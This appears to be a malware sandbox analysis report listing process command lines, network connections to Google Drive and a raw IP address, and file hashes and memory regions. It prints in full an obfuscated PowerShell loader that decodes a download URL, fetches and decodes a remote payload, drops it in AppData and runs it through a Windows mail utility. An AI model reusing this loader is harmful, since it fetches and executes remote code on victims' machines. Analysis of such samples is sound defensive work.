anaiDob.erTilsieMontrfMultiolns.ix Poe./Hipp,1Tilba2 Bele1 Reco.Unnom0Forte ';$Cateringlario=Bevandret 'K.svauo.erasPalpeEVess.RAbort-FrdigAbagsigTmmereAlminn Pa tterhve ';$Kropssprog=Bevandret 'Frimrh,lokkt odeltEmulspAc,uis inde: Ska./Stigr/HereddImarer Re uiTuffev odbe Bind.tovnigGuateoU faroParkegInterlbund eStege.SystucOversoP,rmemSvuls/ BloduApparcLin e?A opeeSchtixOr,efpInstro U flr B,ldtMogot= GrundPlastono.fow da anA.thrlTiljuoS.mora .enndUpflu&Pomo i Tem.dUnm v=Insid1 ntelASvajeRPre oF P stM WhitqRurergT.lriQHo ca9,roemHSmergy oghamChampLRi gepFolebwVrget2HolocXSemesoProjeiTriksFfriedgRhodag conc4Befol4ChronfDupliTTrkl,bS,lteWPrfa,Z Hovey Non NSqui,KRer gOUbeta ';$Nitrosite=Bevandret 'Besti>Su.er ';$Locusting144=Bevandret 'concriEnd ce C,keXGenkb ';$Abdicator='Suldans';$Dicatalectic = Bevandret 'TransePrdikc olamh lleoAbbey Refri%Beaveahaglbp,rayep Ringd algbaE foltDesina acht%Uns,m\Bev sNp rtmo,axonnAftrka RosepKv,lioD,spisMi jttImmunaMedlet Tridi .otlzCo iciFindynPengeg Tress Yabu.AbstrN muraosest,nSkr,e Unma&Glott&Rugni Reduce ominc reskh Resho Fy r Ki kutUlpmi ';Levir (Bevandret 'Palat$RichegGidsel rffeoMinerb ,evoaAstralampel:AntisEA.hopn F.nej O deeUdvidtMoti,=Stili(B rikcBrasem PremdVerni Skbn./ ThebcEvang Agram$DowdiDPrepri rbejcK,leraGrovdtAnsttaEk.emlBir heAttlecHusmnt Tyr iInvescUn og) Ungk ');Levir (Bevandret ' Spu $Ild bgPitomlBefrioE ersbKlim,aM jeml Maal:Do keW Supre AutoeGa sskTiltae .aanndaugad magfGreylr rkrei P ectpervi=Forrd$t murKUo.fir mangoSuf.opAltersOpsnasIn,erpattr rnondeoUdeergEnmes.pr grs FastpLufttlPern iBuf etA.tma( kole$ChimnNHovedi GenetAutomr BrunoSteddsInfigiTanket Ca.aeCache)Unhou ');Levir (Bevandret 'Res r[Bi elNA dele HjertBalli.Kol,kSVa uuecammerKnavevSp oni Stalct ange JamaP St xoEnfeti JernnInkakt DramMHvil.a milin orsyaUnderg MinieTegnerStrit] Stro:Barre:IntenSkapnieSprric aturuF rber Ski,iOverctLeucoyDamn PEksperNitroo SysttKedeloFeriecAutokoKoksel unk Juri =.heat Eriks[ Slv.NCentreAnmastDem r. ReinS DroseOmkrscHologuFlipdrElmaaiLimnotB achyNevscPopsenrDaakao echyt F.broTeroscBoligoCau.alPo luTIndbyy Non pAmoebeKlie ]Fi it:Inval: tatuTParahlTriumsForbe1Perit2Makro ');$Kropssprog=$Weekendfrit[0];$undrunken= (Bevandret 'Unwat$tamp gTe.delTutteOYoungBkogepavok.elEa th:Raakah oldsA BagdV SpalB Ril iT sseODistol KamcoUndvigConstIFo,ktS,eassK M ds=Ap ean jeneE NutswS.ole-FraskoMicroBYrk rJShamoEDek pcFjodoTSuper ZippSJok sYKos.esRev et AbioERastpmMass . Retrn L ukEBedewt Trau.CrucewFodnoECongobSabziCtilkaL LectiT dimEtertuNTermot');$undrunken+=$Enjet[1];Levir ($undrunken);Levir (Bevandret 'Stern$Jarl h AnegaKvartvDicerbSolceiCi,cuoBegunl lhexoBoratgImmigiSalifsOu pekPukke.Amal H TeeteChitta KlosdUnwateDragsropl tsFo sk[Const$ForbrCBindia inintLseneePicayrSour iLi nin .otag nitlSandca ensrRedemiRomeroKruge]Toler= ravi$De,tiM RdstaOve et ChlosSa.me ');$Evese=Bevandret 'Lice $Langehbaan a BearvFag obNephriReconoMatril Proco Re ngLifeliSkihesTryghkIndep.InterDChelooUlejlw B.rnn BelalCapsuosold aGuttid Uni FFiguri Gi.pl PrteeAnfly(E,ten$AcadeKCompur alpeoDend.punfrusIndspsPresip evor AntnoTran g Svan,Sreje$ pulsMTungsu Kludl rkaitC,poniAto adAf,tie,xidanForlyosulphmC,anciNodu,nPhiloast,tutElysiiSmothoPsit n Turia ylonlDetin)Solmi ';$Multidenominational=$Enjet[0];Levir (Bevandret 'Forre$ PartgKatatlU.whiOEpitoBPokeraPayabLC pta:Anta DGrumsaAsla RAcmatTSgneda verhg vedN as,rAParlanAuton= Py.i(Gr.viTSigbeEPetrosCortitBortk-Arbejpfis eA ijuTLdaasHSy os Disce$K.nvoMSysilUMyxopLm.terthead IsockmDKakotERin nNGrafiO virkmSixtyI Amb nfremkaIdriftKostpiDestaOHose nNymphaAnhngLFlipp)De kl ');while (!$Dartagnan) {Levir (Bevandret 'Annui$Ting,gUnfrul Dul o KludbMlle a Fejll ch m:pr.toSOpfathTus haI.dusbSubmoaBiggesFabulhNnsom=Malor$B efotExilirPs uduS aireIse k ') ;Levir $Evese;Levir (Bevandret 'FljetSDgnratScollaC arkr tifttPa,ag-RaglaSToccal RkeneBandledosimp ini gow s4Skyde ');Levir (Bevandret 'Brisk$ Progg partlBilleoVikinbSkakta ThrulSnnek:NaragD Smrsa CoedrN,ncotS tsfadiffugAc.din ChetaAratinSoffi=Tab n( StriTFrstee atsusVidertEkspo-Fori PRepreaBver.tGloheh O.di Askeb$ SkjoMS,akkuAnklalVanditslimiiDentidGa.rne IntenNegleo raemDealliOve rnPseudaSagsbt ensliAncisoMinkinAfln aUnedgl redi)Wh op ') ;Levir (Bevandret 'Net.p$ RivugF brilPostuo Fregbls.laaLivs,l Inde:Hy erDInduseColornln,ero IsoltK rkea OvertPapi u HolimS pho= Unde$PopligBags lresero nticbOlde aGrundlDad i: ClapOGandhpJ,lpapSkriviDr abdMateraTusinnTumpfs Swim+Overh+fodbo%Urteg$TrompWFibrie melleFigurkfoxlieUndernTumtudTinpefSuperrSwankiTiddytVenli.A,klac xpanoCes ku ItainSmrebtInco. ') ;$Kropssprog=$Weekendfrit[$Denotatum];}$Antisiphon47=335402;$filnumre=29061;Levir (Bevandret 'Slutn$Telefg RaadlStenkoSeignb PostaPosnilSpred: enelOSkraavUneneeElevrrForsnmUdle,iLinielNonchiDiagntJu,ioaAweatrDisiliV rucs welltE,ageiPrdikcUnrec ,ucc= Betj MasocGPreboeBevrttTangn-hetaeCCarsmoEpiton ,ncotHypereForton U detLderr Papel$HulkiMCanosuhaandlKissmtMezzoiDollmdPhonae allunRefo o A chmFriv i ubcanSubspaFle btfaksiiSmittoSightnE genaCommel ilte ');Levir (Bevandret 'Cuboi$Em.owgInadhl SulfoPrimrb Han aCog,ol Loft:PumpeSArbejpTr ruoPacetrHieraiinvolnGradag nbros,kibssProprt HurwaAnnult Co tiBes,ooInfilnUns,neMotorrslang C,rtw=,ntra Hyper[Blu.bSDiscryCatvusHobhotLuxu,eTilr m For .OstecCLinieoudspenvolosvLid,aeProlirUdvirtSkopu]Statu:aarti: KronFWernar Dento Co am JustB ChecaMeje,sggeble Fung6Eolop4ant cSsporvtGeleer.emini Un dnAvertg Cita( rick$EternONdkskvdisc e BombrHuggem Bin,iHors lPerfeiOplystGalataContrr OrlaiN,npasOver tHebdoiUndescRepro) ouce ');Levir (Bevandret 'budd $TappegJ ddyl SecuoForsgb T blaNrofflFract: toppOHushouTetantRegnesPatrutOverhiSl,ernFummmgDe.ar H.rod=Iron, Bakk[ bro.S MarcyPerpesSwirrtPanameSpatim Regn.T,adeT ArbeePins xFlagstInter.HypsiE SjllnAgen.c SkrvocarvodJe.emiFranknUnsa gDatao]Advar:Rifle:Des gAPolysSH emsCKiltiI ydskIHalvr.RasteGFngseePe titAnimiS Plait pildrS ormiReimanEfte gKonc.(Wh el$Anti,SCoho,pPropro TonirAut riCoynunFrilagMindls.ullas DeprtGut ia C stt UdmniAn.eloSlappnperfeeTicktrStats) lvsm ');Levir (Bevandret ' Fler$Unbrugfl,xilOutgroFla sb,arbeaUnl,nlFlus :PleocHDestieInde rNeutraAndelu aselsO,erm= Ov.r$CisteONyerhu Warft asersUna,ftScarciF tidn janigRyge .Kiti scoop.uTrkerb uarsPo,tct nmagr,artii Nonsn ShahgSkval( K va$,erisA IngunStenotGudmdisubtlsS mmeiAr,anpNedruhReageo ndernthyr.4 lect7Uncov, Halv$HousefDer,ni annlAr,ognReassuAutormAntenr regneTarif)Ca ak ');Levir $Heraus;"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Undeductible Erklrende Scrutinising #>;$Unidigitate='Paggle';<#Gennemsnitslager Blegeste parasolette Bankrolling Pullman #>;$Lyophile=$host.PrivateData;If ($Lyophile) {$Fichuet++;}function Bevandret($Chay){$Akkordeoner10=$Chay.Length-$Fichuet;for( $Catering=5;$Catering -lt $Akkordeoner10;$Catering+=6){$Sortbrshandel228+=$Chay[$Catering];}$Sortbrshandel228;}function Levir($Circumtonsillar){ & ($Locusting144) ($Circumtonsillar);}$Mats=Bevandret 'PressMGaussoSvajrzIstaniSpra,lFlenslBenziaDokt /Ar.he5Sub r. Zuri0Akk r .dgi(Expr Wg naaiAlsacnDecimdCatasoOctadw equis Trai SeedN TegnT inis Desti1 Comb0Epige.Model0 Flat;Cant exanW P epiaristnOv,rs6Gru,d4Porse;Sturt AfgifxTilt 6Cling4,isto;legis McginrAssigvVapor:Aldol1Frogl2Zardm1Doven.kae l0Dob e)Efter PolyGUnipeeCrowncBlis,kNapifoListe/ Half2 Sy e0Prepe1,pina0 riss0Amtsg1Ala k0Smelt1d.mme Beti,Fe anaiDob.erTilsieMontrfMultiolns.ix Poe./Hipp,1Tilba2 Bele1 Reco.Unnom0Forte ';$Cateringlario=Bevandret 'K.svauo.erasPalpeEVess.RAbort-FrdigAbagsigTmmereAlminn Pa tterhve ';$Kropssprog=Bevandret 'Frimrh,lokkt odeltEmulspAc,uis inde: Ska./Stigr/HereddImarer Re uiTuffev odbe Bind.tovnigGuateoU faroParkegInterlbund eStege.SystucOversoP,rmemSvuls/ BloduApparcLin e?A opeeSchtixOr,efpInstro U flr B,ldtMogot= GrundPlastono.fow da anA.thrlTiljuoS.mora .enndUpflu&Pomo i Tem.dUnm v=Insid1 ntelASvajeRPre oF P stM WhitqRurergT.lriQHo ca9,roemHSmergy oghamChampLRi gepFolebwVrget2HolocXSemesoProjeiTriksFfriedgRhodag conc4Befol4ChronfDupliTTrkl,bS,lteWPrfa,Z Hovey Non NSqui,KRer gOUbeta ';$Nitrosite=Bevandret 'Besti>Su.er ';$Locusting144=Bevandret 'concriEnd ce C,keXGenkb ';$Abdicator='Suldans';$Dicatalectic = Bevandret 'TransePrdikc olamh lleoAbbey Refri%Beaveahaglbp,rayep Ringd algbaE foltDesina acht%Uns,m\Bev sNp rtmo,axonnAftrka RosepKv,lioD,spisMi jttImmunaMedlet Tridi .otlzCo iciFindynPengeg Tress Yabu.AbstrN muraosest,nSkr,e Unma&Glott&Rugni Reduce ominc reskh Resho Fy r Ki kutUlpmi ';Levir (Bevandret 'Palat$RichegGidsel rffeoMinerb ,evoaAstralampel:AntisEA.hopn F.nej O deeUdvidtMoti,=Stili(B rikcBrasem PremdVerni Skbn./ ThebcEvang Agram$DowdiDPrepri rbejcK,leraGrovdtAnsttaEk.emlBir heAttlecHusmnt Tyr iInvescUn og) Ungk ');Levir (Bevandret ' Spu $Ild bgPitomlBefrioE ersbKlim,aM jeml Maal:Do keW Supre AutoeGa sskTiltae .aanndaugad magfGreylr rkrei P ectpervi=Forrd$t murKUo.fir mangoSuf.opAltersOpsnasIn,erpattr rnondeoUdeergEnmes.pr grs FastpLufttlPern iBuf etA.tma( kole$ChimnNHovedi GenetAutomr BrunoSteddsInfigiTanket Ca.aeCache)Unhou ');Levir (Bevandret 'Res r[Bi elNA dele HjertBalli.Kol,kSVa uuecammerKnavevSp oni Stalct ange JamaP St xoEnfeti JernnInkakt DramMHvil.a milin orsyaUnderg MinieTegnerStrit] Stro:Barre:IntenSkapnieSprric aturuF rber Ski,iOverctLeucoyDamn PEksperNitroo SysttKedeloFeriecAutokoKoksel unk Juri =.heat Eriks[ Slv.NCentreAnmastDem r. ReinS DroseOmkrscHologuFlipdrElmaaiLimnotB achyNevscPopsenrDaakao echyt F.broTeroscBoligoCau.alPo luTIndbyy Non pAmoebeKlie ]Fi it:Inval: tatuTParahlTriumsForbe1Perit2Makro ');$Kropssprog=$Weekendfrit[0];$undrunken= (Bevandret 'Unwat$tamp gTe.delTutteOYoungBkogepavok.elEa th:Raakah oldsA BagdV SpalB Ril iT sseODistol KamcoUndvigConstIFo,ktS,eassK M ds=Ap ean jeneE NutswS.ole-FraskoMicroBYrk rJShamoEDek pcFjodoTSuper ZippSJok sYKos.esRev et AbioERastpmMass . Retrn L ukEBedewt Trau.CrucewFodnoECongobSabziCtilkaL LectiT dimEtertuNTermot');$undrunken+=$Enjet[1];Levir ($undrunken);Levir (Bevandret 'Stern$Jarl h AnegaKvartvDicerbSolceiCi,cuoBegunl lhexoBoratgImmigiSalifsOu pekPukke.Amal H TeeteChitta KlosdUnwateDragsropl tsFo sk[Const$ForbrCBindia inintLseneePicayrSour iLi nin .otag nitlSandca ensrRedemiRomeroKruge]Toler= ravi$De,tiM RdstaOve et ChlosSa.me ');$Evese=Bevandret 'Lice $Langehbaan a BearvFag obNephriReconoMatril Proco Re ngLifeliSkihesTryghkIndep.InterDChelooUlejlw B.rnn BelalCapsuosold aGuttid Uni FFiguri Gi.pl PrteeAnfly(E,ten$AcadeKCompur alpeoDend.punfrusIndspsPresip evor AntnoTran g Svan,Sreje$ pulsMTungsu Kludl rkaitC,poniAto adAf,tie,xidanForlyosulphmC,anciNodu,nPhiloast,tutElysiiSmothoPsit n Turia ylonlDetin)Solmi ';$Multidenominational=$Enjet[0];Levir (Bevandret 'Forre$ PartgKatatlU.whiOEpitoBPokeraPayabLC pta:Anta DGrumsaAsla RAcmatTSgneda verhg vedN as,rAParlanAuton= Py.i(Gr.viTSigbeEPetrosCortitBortk-Arbejpfis eA ijuTLdaasHSy os Disce$K.nvoMSysilUMyxopLm.terthead IsockmDKakotERin nNGrafiO virkmSixtyI Amb nfremkaIdriftKostpiDestaOHose nNymphaAnhngLFlipp)De kl ');while (!$Dartagnan) {Levir (Bevandret 'Annui$Ting,gUnfrul Dul o KludbMlle a Fejll ch m:pr.toSOpfathTus haI.dusbSubmoaBiggesFabulhNnsom=Malor$B efotExilirPs uduS aireIse k ') ;Levir $Evese;Levir (Bevandret 'FljetSDgnratScollaC arkr tifttPa,ag-RaglaSToccal RkeneBandledosimp ini gow s4Skyde ');Levir (Bevandret 'Brisk$ Progg partlBilleoVikinbSkakta ThrulSnnek:NaragD Smrsa CoedrN,ncotS tsfadiffugAc.din ChetaAratinSoffi=Tab n( StriTFrstee atsusVidertEkspo-Fori PRepreaBver.tGloheh O.di Askeb$ SkjoMS,akkuAnklalVanditslimiiDentidGa.rne IntenNegleo raemDealliOve rnPseudaSagsbt ensliAncisoMinkinAfln aUnedgl redi)Wh op ') ;Levir (Bevandret 'Net.p$ RivugF brilPostuo Fregbls.laaLivs,l Inde:Hy erDInduseColornln,ero IsoltK rkea OvertPapi u HolimS pho= Unde$PopligBags lresero nticbOlde aGrundlDad i: ClapOGandhpJ,lpapSkriviDr abdMateraTusinnTumpfs Swim+Overh+fodbo%Urteg$TrompWFibrie melleFigurkfoxlieUndernTumtudTinpefSuperrSwankiTiddytVenli.A,klac xpanoCes ku ItainSmrebtInco. ') ;$Kropssprog=$Weekendfrit[$Denotatum];}$Antisiphon47=335402;$filnumre=29061;Levir (Bevandret 'Slutn$Telefg RaadlStenkoSeignb PostaPosnilSpred: enelOSkraavUneneeElevrrForsnmUdle,iLinielNonchiDiagntJu,ioaAweatrDisiliV rucs welltE,ageiPrdikcUnrec ,ucc= Betj MasocGPreboeBevrttTangn-hetaeCCarsmoEpiton ,ncotHypereForton U detLderr Papel$HulkiMCanosuhaandlKissmtMezzoiDollmdPhonae allunRefo o A chmFriv i ubcanSubspaFle btfaksiiSmittoSightnE genaCommel ilte ');Levir (Bevandret 'Cuboi$Em.owgInadhl SulfoPrimrb Han aCog,ol Loft:PumpeSArbejpTr ruoPacetrHieraiinvolnGradag nbros,kibssProprt HurwaAnnult Co tiBes,ooInfilnUns,neMotorrslang C,rtw=,ntra Hyper[Blu.bSDiscryCatvusHobhotLuxu,eTilr m For .OstecCLinieoudspenvolosvLid,aeProlirUdvirtSkopu]Statu:aarti: KronFWernar Dento Co am JustB ChecaMeje,sggeble Fung6Eolop4ant cSsporvtGeleer.emini Un dnAvertg Cita( rick$EternONdkskvdisc e BombrHuggem Bin,iHors lPerfeiOplystGalataContrr OrlaiN,npasOver tHebdoiUndescRepro) ouce ');Levir (Bevandret 'budd $TappegJ ddyl SecuoForsgb T blaNrofflFract: toppOHushouTetantRegnesPatrutOverhiSl,ernFummmgDe.ar H.rod=Iron, Bakk[ bro.S MarcyPerpesSwirrtPanameSpatim Regn.T,adeT ArbeePins xFlagstInter.HypsiE SjllnAgen.c SkrvocarvodJe.emiFranknUnsa gDatao]Advar:Rifle:Des gAPolysSH emsCKiltiI ydskIHalvr.RasteGFngseePe titAnimiS Plait pildrS ormiReimanEfte gKonc.(Wh el$Anti,SCoho,pPropro TonirAut riCoynunFrilagMindls.ullas DeprtGut ia C stt UdmniAn.eloSlappnperfeeTicktrStats) lvsm ');Levir (Bevandret ' Fler$Unbrugfl,xilOutgroFla sb,arbeaUnl,nlFlus :PleocHDestieInde rNeutraAndelu aselsO,erm= Ov.r$CisteONyerhu Warft asersUna,ftScarciF tidn janigRyge .Kiti scoop.uTrkerb uarsPo,tct nmagr,artii Nonsn ShahgSkval( K va$,erisA IngunStenotGudmdisubtlsS mmeiAr,anpNedruhReageo ndernthyr.4 lect7Uncov, Halv$HousefDer,ni annlAr,ognReassuAutormAntenr regneTarif)Ca ak ');Levir $Heraus;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nonapostatizings.Non && echo t"

C:\Program Files (x86)\windows mail\wabmig.exe

"C:\Program Files (x86)\windows mail\wabmig.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 216.58.201.110:443 drive.google.com tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 225.179.250.142.in-addr.arpa udp
GB 216.58.201.110:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.179.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.179.227:80 o.pki.goog tcp
US 8.8.8.8:53 227.179.250.142.in-addr.arpa udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 137.184.191.215:80 137.184.191.215 tcp
US 8.8.8.8:53 215.191.184.137.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 137.184.191.215:80 137.184.191.215 tcp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 137.184.191.215:80 137.184.191.215 tcp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 137.184.191.215:80 137.184.191.215 tcp

Files

memory/5036-0-0x00007FF98BB53000-0x00007FF98BB55000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fgjsd4km.qt5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5036-10-0x00000199F23B0000-0x00000199F23D2000-memory.dmp

memory/5036-11-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

memory/5036-12-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

memory/5036-15-0x00007FF98BB53000-0x00007FF98BB55000-memory.dmp

memory/5036-16-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

memory/4332-17-0x00000000045C0000-0x00000000045F6000-memory.dmp

memory/4332-18-0x0000000004C30000-0x0000000005258000-memory.dmp

memory/4332-19-0x0000000004BA0000-0x0000000004BC2000-memory.dmp

memory/4332-20-0x00000000052D0000-0x0000000005336000-memory.dmp

memory/4332-21-0x0000000005340000-0x00000000053A6000-memory.dmp

memory/4332-31-0x0000000005470000-0x00000000057C4000-memory.dmp

memory/5036-32-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

memory/4332-33-0x0000000005A60000-0x0000000005A7E000-memory.dmp

memory/4332-34-0x0000000005AB0000-0x0000000005AFC000-memory.dmp

memory/5036-35-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

memory/4332-36-0x0000000007250000-0x00000000078CA000-memory.dmp

memory/4332-37-0x0000000006BD0000-0x0000000006BEA000-memory.dmp

memory/4332-38-0x0000000006D10000-0x0000000006DA6000-memory.dmp

memory/4332-39-0x0000000006CA0000-0x0000000006CC2000-memory.dmp

memory/4332-40-0x0000000007E80000-0x0000000008424000-memory.dmp

C:\Users\Admin\AppData\Roaming\Nonapostatizings.Non

MD5 762077e498d7a658ee381fcfaf25d060
SHA1 26410bd382fe84fedeec847889e22f4bb1964931
SHA256 7fa884749148a539e45b787679fe8524daf7f7d8c4c4db6207a60932ab7e7a79
SHA512 60aff6624dca974f03fb57b78408f2505fd2878cbaeaf9a05a434344984c7c373424e3bb30f90db7c800f56100b7bc3cb316b57d3128266accdfbb3a0a2a1c76

memory/4332-42-0x0000000008430000-0x000000000A9B3000-memory.dmp

memory/5036-43-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

memory/1676-44-0x0000000001080000-0x0000000003603000-memory.dmp

memory/1676-58-0x0000000001080000-0x0000000003603000-memory.dmp

memory/5036-61-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-786284298-625481688-3210388970-1000\0f5007522459c86e95ffcc62f32308f1_1b74ca46-c49b-4c52-a57d-8cd1ff70c625

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-786284298-625481688-3210388970-1000\0f5007522459c86e95ffcc62f32308f1_1b74ca46-c49b-4c52-a57d-8cd1ff70c625

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b